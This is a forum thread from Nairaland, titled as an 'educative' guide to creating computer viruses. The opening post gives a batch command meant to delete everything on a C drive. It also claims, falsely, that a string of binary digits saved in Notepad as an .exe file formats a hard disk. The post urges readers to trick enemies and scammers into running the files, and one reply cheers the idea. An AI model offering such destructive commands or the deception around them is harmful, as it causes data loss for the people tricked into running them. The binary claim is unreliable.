Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,153,554 members, 7,819,970 topics. Date: Tuesday, 07 May 2024 at 07:46 AM

How To Create A Computer Virus(educative Purpose Only) - Computers - Nairaland

Nairaland Forum / Science/Technology / Computers / How To Create A Computer Virus(educative Purpose Only) (4458 Views)

How To Remove Computer Virus Without Antivirus / Create A Harmful Computer Virus Using Notepad / How To Connect Blackberry To The Internet(on A Computer) (2) (3) (4)

(1) (Reply) (Go Down)

How To Create A Computer Virus(educative Purpose Only) by kinibigdeal(m): 12:00am On Nov 17, 2014
How to Create Computer Viruses in Simple
Steps -

Note: I beg you in the name of God, dont misuse this information as the sole aim is simply for educative purpose but it can be useful for those scammers that sent junk mails such as "YOU ARE A LUCKY WINNER OF ......"all you need to do is, when they sent you a mail asking you to send your account information and blah...blah..pretend as if you are cooperating with them, then send this virus via email to them, tell them to open it that it contain your account information "My brother if they do, they go commit socide" abeg when you create that file, on no account should you open it on your system. If you do, You are on your own.

Today after a long time i am here to assist you one important lesson of how to create a virus that can destroy your enemy's hard disk as well as its C drive.I am going to explain Two types of viruses.

1 -To Format Entire Hard disk2 -To Format Entire C drive - (Attack on Windows)1 - Virus to Format Entire Hard Disk.This virus will be created as Executable file. This is simple yet Powerful and Harmful virus for the computer that can format your whole hard disk.

Steps :*.Open the Notepad file.*.Copy the below code and Paste it in the
Notepad.01001011000111110010010101010101010000011111100000*.Save the Notepad file with extention ".exe"*.Example: funny.exe Now the Virus is been created, send this file to your enemy and tell them to run. It will format it's whole hard disk. Enjoy!!

2 - Virus to Format "C" Drive.This virus will be created using batch file programming. This is the simple yet powerfull you can also call it as a Harmfull computer virus that can delete all the content of C Drive. This is indirectly an attack on the Windows file.

Steps :*.Open the Notepad file*.Copy the below code and paste it in the Notepad

@Echo offDel C:\ *.* |y*.Save this Notepad file with extention ".bat"*.Example: funny.bat Now this Virus is been created, running this virus can delete all the content in C drive. So send this to your enemy and tell them to run this file. Enjoy!!

Warning:Do not try to run this files on your own computer, i will not be for any damages occurred in your computer.
Re: How To Create A Computer Virus(educative Purpose Only) by kinibigdeal(m): 12:08am On Nov 17, 2014

The first code should look like that
Re: How To Create A Computer Virus(educative Purpose Only) by emmy4lov(m): 1:40am On Nov 17, 2014
Bros Can I use this as a formatting to for pc.. What I mean is when I want to format a pc can just send it to the pc who's memory I want to format..?

1 Like

Re: How To Create A Computer Virus(educative Purpose Only) by MOORCHMOORE(m): 11:23pm On Nov 17, 2014
kinibigdeal:
How to Create Computer Viruses in Simple
Steps -

Note: I beg you in the name of God, dont misuse this information as the sole aim is simply for educative purpose but it can be useful for those scammers that sent junk mails such as "YOU ARE A LUCKY WINNER OF ......"all you need to do is, when they sent you a mail asking you to send your account information and blah...blah..pretend as if you are cooperating with them, then send this virus via email to them, tell them to open it that it contain your account information "My brother if they do, they go commit socide" abeg when you create that file, on no account should you open it on your system. If you do, You are on your own.

Today after a long time i am here to assist you one important lesson of how to create a virus that can destroy your enemy's hard disk as well as its C drive.I am going to explain Two types of viruses.

1 -To Format Entire Hard disk2 -To Format Entire C drive - (Attack on Windows)1 - Virus to Format Entire Hard Disk.This virus will be created as Executable file. This is simple yet Powerful and Harmful virus for the computer that can format your whole hard disk.

Steps :*.Open the Notepad file.*.Copy the below code and Paste it in the
Notepad.01001011000111110010010101010101010000011111100000*.Save the Notepad file with extention ".exe"*.Example: funny.exe Now the Virus is been created, send this file to your enemy and tell them to run. It will format it's whole hard disk. Enjoy!!

2 - Virus to Format "C" Drive.This virus will be created using batch file programming. This is the simple yet powerfull you can also call it as a Harmfull computer virus that can delete all the content of C Drive. This is indirectly an attack on the Windows file.

Steps :*.Open the Notepad file*.Copy the below code and paste it in the Notepad

@Echo offDel C:\ *.* |y*.Save this Notepad file with extention ".bat"*.Example: funny.bat Now this Virus is been created, running this virus can delete all the content in C drive. So send this to your enemy and tell them to run this file. Enjoy!!

Warning:Do not try to run this files on your own computer, i will not be for any damages occurred in your computer.
wow time to waste some hard drive. All dis yahoo idiot better stay clear. Tnx bozzz

(1) (Reply)

Why Use Driver Pack? / Help On How To Fix Pax S920 Pos / Starcomms Suspends Customer's Accounts Indisciminately

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 61
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.